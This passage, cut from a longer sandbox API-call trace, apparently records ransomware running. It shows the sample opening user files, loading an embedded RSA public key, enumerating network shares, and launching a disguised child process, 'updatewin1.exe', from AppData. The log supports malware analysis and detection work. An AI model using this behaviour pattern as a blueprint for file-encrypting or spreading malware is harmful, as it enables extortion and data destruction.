dwReserved1=0x0, cFileName="GpA7mMv_Y7MLF.wav", cAlternateFileName="GPA7MM~1.WAV")) returned 1 [0102.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0102.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0102.127] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\GpA7mMv_Y7MLF.wav") returned=".wav" [0102.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\GpA7mMv_Y7MLF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\gpa7mmv_y7mlf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0102.128] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=89631) returned 1 [0102.128] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0102.134] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15df9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.134] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0102.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0102.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0102.135] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.136] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x15e1f, lpOverlapped=0x0) returned 1 [0102.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0102.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.137] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0102.138] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0102.138] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0102.138] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0102.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0102.139] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0102.139] GetLastError () returned 0x0 [0102.139] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0102.139] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0102.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.139] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0102.139] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0102.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.139] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0102.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15e20) returned 0x9bc8968 [0102.140] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0102.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0102.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0102.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) Thread: id = 44 os_tid = 0x2a8 [0077.256] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x9f2fee0 | out: lphEnum=0x9f2fee0*=0x330c528) returned 0x0 [0078.511] WNetEnumResourceW (in: hEnum=0x330c528, lpcCount=0x9f2fedc, lpBuffer=0x334d5e8, lpBufferSize=0x9f2fed8 | out: lpcCount=0x9f2fedc, lpBuffer=0x334d5e8, lpBufferSize=0x9f2fed8) returned 0x0 [0078.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d65a0 [0078.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6510 [0078.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0078.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6480 [0078.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d61f8 [0078.512] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x334d5e8, lphEnum=0x9f2fe28 | out: lphEnum=0x9f2fe28*=0x32ad1c0) returned 0x0 [0078.554] WNetEnumResourceW (in: hEnum=0x32ad1c0, lpcCount=0x9f2fe24, lpBuffer=0x9b88408, lpBufferSize=0x9f2fe20 | out: lpcCount=0x9f2fe24, lpBuffer=0x9b88408, lpBufferSize=0x9f2fe20) returned 0x103 [0078.554] WNetCloseEnum (hEnum=0x32ad1c0) returned 0x0 [0078.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6510 | out: hHeap=0x630000) returned 1 [0078.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d65a0 | out: hHeap=0x630000) returned 1 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d65a0 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6510 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x332ca30 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6048 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f570 [0078.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d61f8 | out: hHeap=0x630000) returned 1 [0078.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6480 | out: hHeap=0x630000) returned 1 [0078.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6480 [0078.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d61f8 [0078.554] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x334d608, lphEnum=0x9f2fe28 | out: lphEnum=0x9f2fe28*=0x9f2fe44) returned 0x4b8 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6510 | out: hHeap=0x630000) returned 1 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d65a0 | out: hHeap=0x630000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x150) returned 0x6609c0 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d65a0 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6510 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5ee0 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333f570 | out: hHeap=0x630000) returned 1 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6048 | out: hHeap=0x630000) returned 1 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d61f8 | out: hHeap=0x630000) returned 1 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6480 | out: hHeap=0x630000) returned 1 [0097.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ca30 | out: hHeap=0x630000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0097.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0097.459] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x334d628, lphEnum=0x9f2fe28 | out: lphEnum=0x9f2fe28*=0x9f2fe44) returned 0x4c6 [0097.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.460] WNetEnumResourceW (in: hEnum=0x330c528, lpcCount=0x9f2fedc, lpBuffer=0x334d5e8, lpBufferSize=0x9f2fed8 | out: lpcCount=0x9f2fedc, lpBuffer=0x334d5e8, lpBufferSize=0x9f2fed8) returned 0x103 [0097.460] WNetCloseEnum (hEnum=0x330c528) returned 0x0 [0097.460] SendMessageW (hWnd=0x60132, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 46 os_tid = 0x424 Process: id = "6" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" page_root = "0x311b8000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6f8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x2ac [0079.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9b413180, dwHighDateTime=0x1d5d6b4)) [0079.143] GetCurrentProcessId () returned 0x758 [0079.143] GetCurrentThreadId () returned 0x2ac [0079.143] GetTickCount () returned 0x1159963 [0079.143] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=21961044296) returned 1 [0079.177] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0079.177] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1d30000 [0079.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.189] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0079.189] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0079.189] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0079.189] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0079.189] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.190] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.190] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.190] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.191] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.191] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.191] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.192] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.192] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.193] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.193] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0079.193] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x214) returned 0x1d307d0 [0079.193] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.193] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0079.194] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.194] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.194] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0079.195] GetCurrentThreadId () returned 0x2ac [0079.195] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0079.204] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x800) returned 0x1d309f0 [0079.204] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0079.204] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0079.204] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0079.204] SetHandleCount (uNumber=0x20) returned 0x20 [0079.204] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" " [0079.205] GetEnvironmentStringsW () returned 0x234e70* [0079.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0079.205] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x0, Size=0x565) returned 0x1d311f8 [0079.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1d311f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0079.205] FreeEnvironmentStringsW (penv=0x234e70) returned 1 [0079.205] GetLastError () returned 0x0 [0079.205] SetLastError (dwErrCode=0x0) [0079.205] GetLastError () returned 0x0 [0079.205] SetLastError (dwErrCode=0x0) [0079.205] GetLastError () returned 0x0 [0079.206] SetLastError (dwErrCode=0x0) [0079.206] GetACP () returned 0x4e4 [0079.206] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x0, Size=0x220) returned 0x1d31768 [0079.206] GetLastError () returned 0x0 [0079.206] SetLastError (dwErrCode=0x0) [0079.206] IsValidCodePage (CodePage=0x4e4) returned 1 [0079.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0079.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0079.206] GetLastError () returned 0x0 [0079.206] SetLastError (dwErrCode=0x0) [0079.206] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0079.207] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.207] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.207] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0079.207] GetLastError () returned 0x0 [0079.207] SetLastError (dwErrCode=0x0) [0079.207] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0079.207] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.207] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ壉胩㞕AĀ") returned 256 [0079.207] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ壉胩㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0079.207] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ壉胩㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", 